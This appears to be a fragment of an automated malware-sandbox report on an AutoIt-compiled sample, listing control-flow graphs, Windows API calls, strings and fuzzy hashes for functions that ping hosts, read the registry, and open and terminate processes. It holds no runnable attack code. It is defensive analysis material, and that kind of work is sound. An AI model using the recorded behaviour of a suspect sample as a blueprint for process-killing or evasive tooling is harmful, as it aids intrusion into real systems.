                                              • Opcode Fuzzy Hash: bed41c3f4d31488a35fb6cdb79c0be47fe214828f326f8e2a744da3afa986826
                                              • Instruction Fuzzy Hash: 39314771845309EFEB418FA4DC88BD9BBF0FB09310F10455AE584E62A0D7B90596DF52

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00033444
                                              • RegisterClassExW.USER32(00000030), ref: 0003346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 0003349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
                                              • LoadIconW.USER32(000000A9), ref: 000334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: b612e2587241490058c73d3f8ea0a9c2b756e251705e04450695e4211540d777
                                              • Instruction ID: bda3fea34b7c571c42406a02f31fc1d931f8c56a68ef703601b5060de969a005
                                              • Opcode Fuzzy Hash: b612e2587241490058c73d3f8ea0a9c2b756e251705e04450695e4211540d777
                                              • Instruction Fuzzy Hash: 3C21E5B1D44308EFEB009FA4EC89B9DBBF4FB08710F10411AF514A62A0D7B91545DF92

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00043094), ref: 000500ED
                                                • Part of subcall function 000508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0004309F), ref: 000508E3
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000430E2
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000801BA
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000801FB
                                              • RegCloseKey.ADVAPI32(?), ref: 00080239
                                              • _wcscat.LIBCMT ref: 00080292
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: 849f11d70c07fcbdd201a853e46ddd83ae3c798c01002696fcab9a9e9030bf74
                                              • Instruction ID: 4ed8c9349c6b4b2358174bfa57b771e0a4c802f8e9dffb95269d8c5c9dc6239d
                                              • Opcode Fuzzy Hash: 849f11d70c07fcbdd201a853e46ddd83ae3c798c01002696fcab9a9e9030bf74
                                              • Instruction Fuzzy Hash: C6719CB15093019AD784EF24E8819EFBBE8FF89310F40452EF585832A1EF74A948DB56

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00045156
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00045165
                                              • LoadIconW.USER32(00000063), ref: 0004517C
                                              • LoadIconW.USER32(000000A4), ref: 0004518E
                                              • LoadIconW.USER32(000000A2), ref: 000451A0
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000451C6
                                              • RegisterClassExW.USER32(?), ref: 0004521C
                                                • Part of subcall function 00033411: GetSysColorBrush.USER32(0000000F), ref: 00033444
                                                • Part of subcall function 00033411: RegisterClassExW.USER32(00000030), ref: 0003346E
                                                • Part of subcall function 00033411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
                                                • Part of subcall function 00033411: InitCommonControlsEx.COMCTL32(?), ref: 0003349C
                                                • Part of subcall function 00033411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
                                                • Part of subcall function 00033411: LoadIconW.USER32(000000A9), ref: 000334C2
                                                • Part of subcall function 00033411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 3384b05136e531173714c4e71752d865d4849859048c2c9e5d4e1a0919f61ff6
                                              • Instruction ID: fece9a3a7ebc408d2e9a4ae241a24f726397c1b71ad4d676c7783a8f6fa8623f
                                              • Opcode Fuzzy Hash: 3384b05136e531173714c4e71752d865d4849859048c2c9e5d4e1a0919f61ff6
                                              • Instruction Fuzzy Hash: 94213970D08308EBFB559FA4ED09BAD7FB4FB08321F004119F508A66A1D7B95550EF85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 983 a5e1d-a5e54 call 34dc0 986 a5e56-a5e63 call 3502b 983->986 987 a5e74-a5e86 WSAStartup 983->987 986->987 996 a5e65-a5e70 call 3502b 986->996 988 a5e88-a5e98 call 87135 987->988 989 a5e9d-a5edb call 440cd call 34d37 call 4402a inet_addr gethostbyname 987->989 998 a5ff6-a5ffe 988->998 1004 a5eec-a5efc call 87135 989->1004 1005 a5edd-a5eea IcmpCreateFile 989->1005 996->987 1010 a5fed-a5ff1 call 41cb6 1004->1010 1005->1004 1006 a5f01-a5f32 call 50fe6 call 4433f 1005->1006 1015 a5f34-a5f53 IcmpSendEcho 1006->1015 1016 a5f55-a5f69 IcmpSendEcho 1006->1016 1010->998 1017 a5f6d-a5f6f 1015->1017 1016->1017 1018 a5fa2-a5fa4 1017->1018 1019 a5f71-a5f76 1017->1019 1020 a5fa6-a5fb2 call 87135 1018->1020 1021 a5fba-a5fcc call 34dc0 1019->1021 1022 a5f78-a5f7d 1019->1022 1030 a5fd4-a5fe8 IcmpCloseHandle WSACleanup call 445ae 1020->1030 1031 a5fce-a5fd0 1021->1031 1032 a5fd2 1021->1032 1025 a5f7f-a5f84 1022->1025 1026 a5fb4-a5fb8 1022->1026 1025->1018 1029 a5f86-a5f8b 1025->1029 1026->1020 1033 a5f9a-a5fa0 1029->1033 1034 a5f8d-a5f92 1029->1034 1030->1010 1031->1030 1032->1030 1033->1020 1034->1026 1036 a5f94-a5f98 1034->1036 1036->1020
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 000A5E7E
                                              • inet_addr.WSOCK32(?,?,?), ref: 000A5EC3
                                              • gethostbyname.WS2_32(?), ref: 000A5ECF
                                              • IcmpCreateFile.IPHLPAPI ref: 000A5EDD
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000A5F4D
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000A5F63
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000A5FD8
                                              • WSACleanup.WSOCK32 ref: 000A5FDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 9a92f09c43e94e6e1af60487ec11c5e6947c122b4d3712cbe54beae6e25efbb6
                                              • Instruction ID: 10db87df1c82ec7bbc1e10deadbd003bfc912a2c0ba70c1af29d7749a0fb7f61
                                              • Opcode Fuzzy Hash: 9a92f09c43e94e6e1af60487ec11c5e6947c122b4d3712cbe54beae6e25efbb6
                                              • Instruction Fuzzy Hash: 2D519A316046009FDB20EF64CC89F6AB7E4BF49711F144929F999DB2A2DB74ED00CB42

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1037 44d83-44dd1 1039 44e31-44e33 1037->1039 1040 44dd3-44dd6 1037->1040 1039->1040 1041 44e35 1039->1041 1042 44e37 1040->1042 1043 44dd8-44ddf 1040->1043 1044 44e1a-44e22 DefWindowProcW 1041->1044 1045 44e3d-44e40 1042->1045 1046 809c2-809f0 call 3c460 call 3c483 1042->1046 1047 44de5-44dea 1043->1047 1048 44ead-44eb5 PostQuitMessage 1043->1048 1049 44e28-44e2e 1044->1049 1051 44e65-44e8c SetTimer RegisterWindowMessageW 1045->1051 1052 44e42-44e43 1045->1052 1080 809f5-809fc 1046->1080 1053 44df0-44df2 1047->1053 1054 80a35-80a49 call 92cce 1047->1054 1050 44e61-44e63 1048->1050 1050->1049 1051->1050 1058 44e8e-44e99 CreatePopupMenu 1051->1058 1056 80965-80968 1052->1056 1057 44e49-44e5c KillTimer call 45ac3 call 334e4 1052->1057 1059 44eb7-44ec1 call 45b29 1053->1059 1060 44df8-44dfd 1053->1060 1054->1050 1071 80a4f 1054->1071 1065 8096a-8096c 1056->1065 1066 8099e-809bd MoveWindow 1056->1066 1057->1050 1058->1050 1073 44ec6 1059->1073 1068 80a1a-80a21 1060->1068 1069 44e03-44e08 1060->1069 1074 8098d-80999 SetFocus 1065->1074 1075 8096e-80971 1065->1075 1066->1050 1068->1044 1077 80a27-80a30 call 88854 1068->1077 1078 44e0e-44e14 1069->1078 1079 44e9b-44eab call 45bd7 1069->1079 1071->1044 1073->1050 1074->1050 1075->1078 1081 80977-80988 call 3c460 1075->1081 1077->1044 1078->1044 1078->1080 1079->1050 1080->1044 1086 80a02-80a15 call 45ac3 call 459d3 1080->1086 1081->1050 1086->1044
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00044E22
                                              • KillTimer.USER32(?,00000001), ref: 00044E4C
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00044E6F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00044E7A
                                              • CreatePopupMenu.USER32 ref: 00044E8E
                                              • PostQuitMessage.USER32(00000000), ref: 00044EAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: 874edad56cd86f6b15b2447c929bf0f8a3d30f71e7bbfb0de313b2d041592671
                                              • Instruction ID: 7ed1a17b77dbf4edb36df470f88a6f0fb71a829d1009af1db902cdd49d796142
                                              • Opcode Fuzzy Hash: 874edad56cd86f6b15b2447c929bf0f8a3d30f71e7bbfb0de313b2d041592671
                                              • Instruction Fuzzy Hash: 4E4129B164820AABFBA56F24DC0DBBE36D9F750301F000235F646925A2CB799C51F76B

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1094 3ad98-3add1 1095 72f63-72f64 DestroyWindow 1094->1095 1096 3add7-3aded mciSendStringW 1094->1096 1099 72f6f-72f7c 1095->1099 1097 3adf3-3adfb 1096->1097 1098 3afc0-3afcd 1096->1098 1097->1099 1102 3ae01-3ae10 call 3c71f 1097->1102 1100 3aff2-3aff9 1098->1100 1101 3afcf-3afea UnregisterHotKey 1098->1101 1104 72f7e-72f81 1099->1104 1105 72fab-72fb2 1099->1105 1100->1097 1107 3afff 1100->1107 1101->1100 1106 3afec-3afed call 50dd1 1101->1106 1113 3ae16-3ae1e 1102->1113 1114 72fb9-72fc5 1102->1114 1109 72f83-72f8b call 442cf 1104->1109 1110 72f8d-72f90 FindClose 1104->1110 1105->1099 1112 72fb4 1105->1112 1106->1100 1107->1098 1116 72f96-72fa3 1109->1116 1110->1116 1112->1114 1119 3ae24-3ae49 call 34dc0 1113->1119 1120 72fdd-72fea 1113->1120 1117 72fc7-72fc9 FreeLibrary 1114->1117 1118 72fcf-72fd6 1114->1118 1116->1105 1122 72fa5-72fa6 call 9a20c 1116->1122 1117->1118 1118->1114 1123 72fd8 1118->1123 1131 3ae80-3ae8b OleUninitialize 1119->1131 1132 3ae4b 1119->1132 1125 73011-73018 1120->1125 1126 72fec-73009 VirtualFree 1120->1126 1122->1105 1123->1120 1125->1120 1130 7301a 1125->1130 1126->1125 1129 7300b-7300c call 9a266 1126->1129 1129->1125 1135 7301f-73022 1130->1135 1131->1135 1136 3ae91-3ae96 1131->1136 1134 3ae4e-3ae7e call 4fd60 call 4fdf5 1132->1134 1134->1131 1135->1136 1138 73028-7302e 1135->1138 1139 73033-73040 call 9a240 1136->1139 1140 3ae9c-3aea6 1136->1140 1138->1136 1151 73042 1139->1151 1143 3b001-3b00e call 50abc 1140->1143 1144 3aeac-3af22 call 41cb6 call 4fef1 call 44c0a call 5052f call 41cb6 call 34dc0 call 50989 call 50b4f * 3 1140->1144 1143->1144 1154 3b014 1143->1154 1157 73047-73054 call 8d5cb 1144->1157 1187 3af28-3af3b call 313ae 1144->1187 1151->1157 1154->1143 1163 73056 1157->1163 1166 7305b-73068 call 503e3 1163->1166 1172 7306a 1166->1172 1175 7306f-7307c call 87236 1172->1175 1181 7307e 1175->1181 1184 73083-73090 call 9a224 1181->1184 1190 73092 1184->1190 1187->1166 1192 3af41-3af49 1187->1192 1193 73097-730a4 call 9a224 1190->1193 1192->1175 1194 3af4f-3af6d call 41cb6 call 43868 1192->1194 1199 730a6 1193->1199 1194->1184 1202 3af73-3af81 1194->1202 1199->1199 1202->1193 1203 3af87-3afbf call 41cb6 * 3 call 50351 1202->1203
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0003ADE1
                                              • OleUninitialize.OLE32(?,00000000), ref: 0003AE80
                                              • UnregisterHotKey.USER32(?), ref: 0003AFD7
                                              • DestroyWindow.USER32(?), ref: 00072F64
                                              • FreeLibrary.KERNEL32(?), ref: 00072FC9
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00072FF6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: ccd1a589f3a0290e2cc5ea8eb07b97c2ad8c6c5556f196aff171f6d421a47c28
                                              • Instruction ID: 52267d5c1707ba3c34383583b0719f0f6a692f52a7af8a903ca5b35139146e15
                                              • Opcode Fuzzy Hash: ccd1a589f3a0290e2cc5ea8eb07b97c2ad8c6c5556f196aff171f6d421a47c28
                                              • Instruction Fuzzy Hash: 6AA17070B01212CFDB69EF54C495B6DF3A4BF05700F1482ADE84AAB252CB35AD16CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1212 456f8-4570f 1213 45715-4572a call 4162d 1212->1213 1214 457fa-457ff 1212->1214 1217 80c4c-80c5b LoadStringW 1213->1217 1218 45730-4574c call 41821 1213->1218 1221 80c66-80c6f call 41c9c 1217->1221 1222 45752-4575a 1218->1222 1223 80c74-80c82 call 42f15 1218->1223 1228 45778-457f5 call 53010 call 45c36 call 52fec Shell_NotifyIconW call 41cb6 1221->1228 1222->1221 1226 45760-45773 call 41900 call 417e0 1222->1226 1223->1228 1233 80c88-80c93 call 90296 1223->1233 1226->1228 1228->1214 1240 80cc0-80cf7 call 90220 call 538c8 call 41900 call 42f15 call 41900 1233->1240 1241 80c95-80cbb call 41207 call 90252 call 417e0 call 41cb6 1233->1241 1240->1228 1241->1240
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00080C5B
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • _memset.LIBCMT ref: 00045787
                                              • _wcscpy.LIBCMT ref: 000457DB
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000457EB
                                              • __swprintf.LIBCMT ref: 00080CD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                              • String ID: Line %d: $AutoIt - $E*E*
                                              • API String ID: 230667853-948538831
                                              • Opcode ID: bd42895f238c93208c54cbf62efe3d75aa72abf5c3b4210428c193311688eb90
                                              • Instruction ID: 47f8ee0c50ac550803f4a944f6bb4256e2f39caef9963bd623d9ec599a521db6
                                              • Opcode Fuzzy Hash: bd42895f238c93208c54cbf62efe3d75aa72abf5c3b4210428c193311688eb90
                                              • Instruction Fuzzy Hash: 434183B1408304ABD761EB64DC85AEF77ECAF44354F10063EF589920A3DB74A649C79B

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1262 af01c-af04b call 34d37 call 94148 1266 af050-af053 1262->1266 1267 af07c-af080 1266->1267 1268 af055-af077 call 34dc0 call 87135 1266->1268 1270 af086-af09a OpenProcess 1267->1270 1271 af194-af1a5 call 34dc0 1267->1271 1284 af1a7-af1af 1268->1284 1273 af149-af154 TerminateProcess 1270->1273 1274 af0a0-af0a9 GetLastError 1270->1274 1271->1284 1276 af18b-af192 CloseHandle 1273->1276 1277 af156-af184 GetLastError call 4fdae call 87135 call 34dc0 1273->1277 1279 af0ab-af0c5 call 93aa0 call 89399 1274->1279 1280 af115-af13e call 4fdae call 87135 call 34dc0 1274->1280 1276->1284 1277->1276 1297 af0d9-af103 call 4fdae call 87135 call 34dc0 1279->1297 1298 af0c7-af0d7 OpenProcess 1279->1298 1306 af145-af147 1280->1306 1301 af10a-af113 call 88de9 1297->1301 1298->1301 1301->1306 1306->1273 1306->1284
                                              APIs
                                                • Part of subcall function 00094148: CreateToolhelp32Snapshot.KERNEL32 ref: 0009416D
                                                • Part of subcall function 00094148: Process32FirstW.KERNEL32(00000000,?), ref: 0009417B
                                                • Part of subcall function 00094148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00094245
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000AF08D
                                              • GetLastError.KERNEL32 ref: 000AF0A0
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000AF0CF
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 000AF14C
                                              • GetLastError.KERNEL32(00000000), ref: 000AF157
                                              • CloseHandle.KERNEL32(00000000), ref: 000AF18C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 1701285019-2896544425
                                              • Opcode ID: 2773c7933810128674761e9ce52a3add46c6a925fa10c4b7c0b0c4866e0f3462
                                              • Instruction ID: 711d8647aabc85bd93849af2e2d1d01a50b4823fac107ab3b5a64667ba032500
                                              • Opcode Fuzzy Hash: 2773c7933810128674761e9ce52a3add46c6a925fa10c4b7c0b0c4866e0f3462
                                              • Instruction Fuzzy Hash: 5841BB702002029FDB21EFA4CC95FBDB7A5AF80714F188428F9469F293CBB4AD05CB85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1354 45d13-45d73 call 41207 GetVersionExW call 41821 1359 45e78-45e7a 1354->1359 1360 45d79 1354->1360 1361 80fa9-80fb5 1359->1361 1362 45d7c-45d81 1360->1362 1363 80fb6-80fba 1361->1363 1364 45d87 1362->1364 1365 45e7f-45e80 1362->1365 1367 80fbc 1363->1367 1368 80fbd-80fc9 1363->1368 1366 45d88-45dbf call 41981 call 4133d 1364->1366 1365->1366 1377 81098-8109b 1366->1377 1378 45dc5-45dc6 1366->1378 1367->1368 1368->1363 1369 80fcb-80fd0 1368->1369 1369->1362 1371 80fd6-80fdd 1369->1371 1371->1361 1373 80fdf 1371->1373 1376 80fe4-80fea 1373->1376 1383 45e00-45e17 GetCurrentProcess IsWow64Process 1376->1383 1379 8109d 1377->1379 1380 810b4-810b8 1377->1380 1381 80fef-80ffa 1378->1381 1382 45dcc-45dcf 1378->1382 1386 810a0 1379->1386 1388 810ba-810c3 1380->1388 1389 810a3-810ac 1380->1389 1384 80ffc-81002 1381->1384 1385 81017-81019 1381->1385 1382->1383 1387 45dd1-45def 1382->1387 1390 45e1c-45e2d 1383->1390 1391 45e19 1383->1391 1392 8100c-81012 1384->1392 1393 81004-81007 1384->1393 1395 8101b-81027 1385->1395 1396 8103c-8103f 1385->1396 1386->1389 1387->1383 1394 45df1-45df7 1387->1394 1388->1386 1397 810c5-810c8 1388->1397 1389->1380 1398 45e2f-45e3f call 455f0 1390->1398 1399 45e98-45ea2 GetSystemInfo 1390->1399 1391->1390 1392->1383 1393->1383 1394->1376 1400 45dfd 1394->1400 1401 81029-8102c 1395->1401 1402 81031-81037 1395->1402 1404 81041-81050 1396->1404 1405 81065-81068 1396->1405 1397->1389 1411 45e41-45e4e call 455f0 1398->1411 1412 45e8c-45e96 GetSystemInfo 1398->1412 1403 45e65-45e75 1399->1403 1400->1383 1401->1383 1402->1383 1407 8105a-81060 1404->1407 1408 81052-81055 1404->1408 1405->1383 1410 8106e-81083 1405->1410 1407->1383 1408->1383 1413 8108d-81093 1410->1413 1414 81085-81088 1410->1414 1419 45e85-45e8a 1411->1419 1420 45e50-45e54 GetNativeSystemInfo 1411->1420 1415 45e56-45e5a 1412->1415 1413->1383 1414->1383 1415->1403 1418 45e5c-45e5f FreeLibrary 1415->1418 1418->1403 1419->1420 1420->1415
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00045D40
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • GetCurrentProcess.KERNEL32(?,000C0A18,00000000,00000000,?), ref: 00045E07
                                              • IsWow64Process.KERNEL32(00000000), ref: 00045E0E
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00045E54
                                              • FreeLibrary.KERNEL32(00000000), ref: 00045E5F
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00045E90
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00045E9C
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: e79d8b807b68338c0f2f8250e205f8665972421970eec663b65a8de9951eb69d
                                              • Instruction ID: f187e5475d9516e5b0360b3782eb1725c019881837ba0266ef85f6f2eef16470
                                              • Opcode Fuzzy Hash: e79d8b807b68338c0f2f8250e205f8665972421970eec663b65a8de9951eb69d
                                              • Instruction Fuzzy Hash: EA91F371549BC0DFC775DB7888504AEFFE56F2A301B884AAED0C783A42D234A648C75E
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00059D16
                                                • Part of subcall function 000533B7: EncodePointer.KERNEL32(00000000), ref: 000533BA
                                                • Part of subcall function 000533B7: __initp_misc_winsig.LIBCMT ref: 000533D5
                                                • Part of subcall function 000533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0005A0D0
